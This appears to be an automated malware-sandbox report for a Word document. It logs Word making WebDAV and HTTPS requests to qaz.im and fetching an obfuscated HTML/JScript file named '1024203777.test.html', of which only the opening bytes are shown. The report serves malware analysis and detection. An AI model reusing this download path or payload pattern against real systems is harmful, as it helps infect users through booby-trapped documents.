Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session IDSource IPSource PortDestination IPDestination PortProcess
20192.168.2.224919182.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:29 UTC75OUTGET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:29 UTC75INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"
2022-09-02 11:24:29 UTC76INData Raw: 3c 21 64 6f 63 54 59 70 65 20 48 54 4d 4c 3e 0d 0a 0d 0a 3c 68 54 6d 6c 3e 0d 0a 0d 0a 3c 62 4f 44 79 3e 0d 0a 0d 0a 3c 73 43 72 69 50 54 20 4c 61 6e 47 75 61 67 45 3d 22 6a 53 43 72 69 70 74 22 3e 0d 0a 0d 0a 2f 2f 41 76 39 47 77 56 76 5a 50 46 63 77 35 35 68 37 58 76 71 36 65 69 4e 77 33 33 77 6e 31 6b 4c 4d 4d 74 67 4b 6c 78 6d 48 4a 4c 71 6c 42 30 46 62 6b 53 70 53 6c 76 36 68 76 73 35 55 66 65 32 32 35 53 67 46 4a 58 5a 57 75 64 69 72 6c 6c 58 38 31 31 75 69 4c 78 64 4b 56 72 31 30 33 62 71 61 50 57 51 39 35 63 31 77 44 32 58 4d 4c 6c 4b 4e 4f 59 4f 34 77 43 6a 52 6f 74 33 58 68 30 5a 68 4c 7a 43 45 64 64 79 42 48 52 61 52 53 50 50 30 74 78 58 66 35 35 43 6a 73 74 52 43 41 47 78 30 75 6d 49 63 55 79 41 76 37 6c 39 45 64 37 5a 65 59 36 64 64 49 7a 6f
Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo
2022-09-02 11:24:29 UTC91INData Raw: 64 62 31 6e 58 55 6b 61 50 4b 37 37 44 33 71 56 63 52 38 52 61 50 73 61 45 52 36 43 71 53 65 31 48 6c 41 50 54 4b 4a 6c 4a 49 39 39 68 6f 76 41 72 76 79 36 7a 77 78 4c 30 75 46 30 64 51 6a 6e 6f 59 67 43 39 42 7a 6f 73 58 64 33 70 72 4d 30 70 58 64 61 45 48 72 72 6d 66 6f 70 66 78 4e 39 72 30 53 51 6a 64 44 55 6c 34 56 36 6d 6b 5a 70 38 4b 30 39 51 78 30 75 42 6a 68 76 34 61 7a 72 36 39 50 50 4c 42 4e 62 63 76 64 61 67 30 77 4e 54 4c 30 35 6b 56 6d 48 75 38 6f 62 30 70 78 69 42 31 52 4f 41 4d 74 76 37 38 78 6d 68 38 73 54 54 61 58 68 4d 52 63 6b 61 76 33 38 65 46 6a 55 6c 65 53 66 4d 68 39 45 74 6b 4c 78 30 68 6e 72 6e 36 57 45 50 4a 76 35 73 36 4b 6e 39 4c 66 77 56 34 4d 58 33 6b 61 49 62 6c 6b 50 6a 44 37 4c 36 76 70 7a 33 65 35 35 52 69 5a 72 65 65 43
Data Ascii: db1nXUkaPK77D3qVcR8RaPsaER6CqSe1HlAPTKJlJI99hovArvy6zwxL0uF0dQjnoYgC9BzosXd3prM0pXdaEHrrmfopfxN9r0SQjdDUl4V6mkZp8K09Qx0uBjhv4azr69PPLBNbcvdag0wNTL05kVmHu8ob0pxiB1ROAMtv78xmh8sTTaXhMRckav38eFjUleSfMh9EtkLx0hnrn6WEPJv5s6Kn9LfwV4MX3kaIblkPjD7L6vpz3e55RiZreeC


Session IDSource IPSource PortDestination IPDestination PortProcess
21192.168.2.224919282.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:58 UTC94OUTGET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
2022-09-02 11:24:58 UTC95INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:58 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 19364
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: 0
Cache-Control: must-revalidate
Pragma: public
Content-Transfer-Encoding: binary
Content-Disposition: attachment;filename="1024203777.test.html"
2022-09-02 11:24:58 UTC95INData Raw: 3c 21 64 6f 63 54 59 70 65 20 48 54 4d 4c 3e 0d 0a 0d 0a 3c 68 54 6d 6c 3e 0d 0a 0d 0a 3c 62 4f 44 79 3e 0d 0a 0d 0a 3c 73 43 72 69 50 54 20 4c 61 6e 47 75 61 67 45 3d 22 6a 53 43 72 69 70 74 22 3e 0d 0a 0d 0a 2f 2f 41 76 39 47 77 56 76 5a 50 46 63 77 35 35 68 37 58 76 71 36 65 69 4e 77 33 33 77 6e 31 6b 4c 4d 4d 74 67 4b 6c 78 6d 48 4a 4c 71 6c 42 30 46 62 6b 53 70 53 6c 76 36 68 76 73 35 55 66 65 32 32 35 53 67 46 4a 58 5a 57 75 64 69 72 6c 6c 58 38 31 31 75 69 4c 78 64 4b 56 72 31 30 33 62 71 61 50 57 51 39 35 63 31 77 44 32 58 4d 4c 6c 4b 4e 4f 59 4f 34 77 43 6a 52 6f 74 33 58 68 30 5a 68 4c 7a 43 45 64 64 79 42 48 52 61 52 53 50 50 30 74 78 58 66 35 35 43 6a 73 74 52 43 41 47 78 30 75 6d 49 63 55 79 41 76 37 6c 39 45 64 37 5a 65 59 36 64 64 49 7a 6f
Data Ascii: <!docTYpe HTML><hTml><bODy><sCriPT LanGuagE="jSCript">//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo
2022-09-02 11:24:58 UTC111INData Raw: 64 62 31 6e 58 55 6b 61 50 4b 37 37 44 33 71 56 63 52 38 52 61 50 73 61 45 52 36 43 71 53 65 31 48 6c 41 50 54 4b 4a 6c 4a 49 39 39 68 6f 76 41 72 76 79 36 7a 77 78 4c 30 75 46 30 64 51 6a 6e 6f 59 67 43 39 42 7a 6f 73 58 64 33 70 72 4d 30 70 58 64 61 45 48 72 72 6d 66 6f 70 66 78 4e 39 72 30 53 51 6a 64 44 55 6c 34 56 36 6d 6b 5a 70 38 4b 30 39 51 78 30 75 42 6a 68 76 34 61 7a 72 36 39 50 50 4c 42 4e 62 63 76 64 61 67 30 77 4e 54 4c 30 35 6b 56 6d 48 75 38 6f 62 30 70 78 69 42 31 52 4f 41 4d 74 76 37 38 78 6d 68 38 73 54 54 61 58 68 4d 52 63 6b 61 76 33 38 65 46 6a 55 6c 65 53 66 4d 68 39 45 74 6b 4c 78 30 68 6e 72 6e 36 57 45 50 4a 76 35 73 36 4b 6e 39 4c 66 77 56 34 4d 58 33 6b 61 49 62 6c 6b 50 6a 44 37 4c 36 76 70 7a 33 65 35 35 52 69 5a 72 65 65 43
Data Ascii: db1nXUkaPK77D3qVcR8RaPsaER6CqSe1HlAPTKJlJI99hovArvy6zwxL0uF0dQjnoYgC9BzosXd3prM0pXdaEHrrmfopfxN9r0SQjdDUl4V6mkZp8K09Qx0uBjhv4azr69PPLBNbcvdag0wNTL05kVmHu8ob0pxiB1ROAMtv78xmh8sTTaXhMRckav38eFjUleSfMh9EtkLx0hnrn6WEPJv5s6Kn9LfwV4MX3kaIblkPjD7L6vpz3e55RiZreeC


Session IDSource IPSource PortDestination IPDestination PortProcess
3192.168.2.224917482.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:22 UTC1OUTOPTIONS /index.php?a=download&q=file_not_exist HTTP/1.1
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: qaz.im
2022-09-02 11:24:22 UTC1INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:22 UTC2INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66
Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session IDSource IPSource PortDestination IPDestination PortProcess
4192.168.2.224917582.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:23 UTC6OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 6c 6f 61 64 2f 64 69 79 35 41 48 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /load/diy5AH HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:23 UTC6INHTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session IDSource IPSource PortDestination IPDestination PortProcess
5192.168.2.224917682.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:23 UTC7OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 69 6e 64 65 78 2e 70 68 70 3f 61 3d 64 6f 77 6e 6c 6f 61 64 26 71 3d 66 69 6c 65 5f 6e 6f 74 5f 65 78 69 73 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:23 UTC7INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:23 UTC7INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66
Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session IDSource IPSource PortDestination IPDestination PortProcess
6192.168.2.224917782.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:23 UTC11OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 6c 6f 61 64 2f 64 69 79 35 41 48 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /load/diy5AH HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:23 UTC12INHTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:23 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session IDSource IPSource PortDestination IPDestination PortProcess
7192.168.2.224917882.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:24 UTC12OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 69 6e 64 65 78 2e 70 68 70 3f 61 3d 64 6f 77 6e 6c 6f 61 64 26 71 3d 66 69 6c 65 5f 6e 6f 74 5f 65 78 69 73 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:24 UTC12INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:24 UTC13INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66
Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Session IDSource IPSource PortDestination IPDestination PortProcess
8192.168.2.224917982.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:24 UTC17OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 6c 6f 61 64 2f 64 69 79 35 41 48 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /load/diy5AH HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:24 UTC17INHTTP/1.1 302 Found
Server: nginx
Date: Fri, 02 Sep 2022 11:24:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://qaz.im/index.php?a=download&q=file_not_exist


Session IDSource IPSource PortDestination IPDestination PortProcess
9192.168.2.224918082.202.173.45443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
TimestampkBytes transferredDirectionData
2022-09-02 11:24:24 UTC17OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 69 6e 64 65 78 2e 70 68 70 3f 61 3d 64 6f 77 6e 6c 6f 61 64 26 71 3d 66 69 6c 65 5f 6e 6f 74 5f 65 78 69 73 74 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 6d 64 62 76 69 37 34 6e 36 71 72 6c 76 76 75 6d 67 39 66 72 38 67 31 73 6e 34 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 71 61 7a 2e 69 6d 0d 0a 0d 0a
Data Ascii: PROPFIND /index.php?a=download&q=file_not_exist HTTP/1.1Connection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: qaz.im
2022-09-02 11:24:24 UTC18INHTTP/1.1 200 OK
Server: nginx
Date: Fri, 02 Sep 2022 11:24:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4473
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
2022-09-02 11:24:24 UTC18INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 0a 3c 74 69 74 6c 65 3e 50 72 69 76 61 74 65 20 46 69 6c 65 20 53 68 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66
Data Ascii: <!DOCTYPE html><html lang="en" xmlns="http://www.w3.org/1999/html"><head><meta charset="UTF-8" /><title>Private File Share</title><meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=0"><link rel="shortcut icon" href


Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

General

Target ID:0
Start time:13:23:18
Start date:02/09/2022
Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):false
Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:0x13f860000
File size:1423704 bytes
MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

No disassembly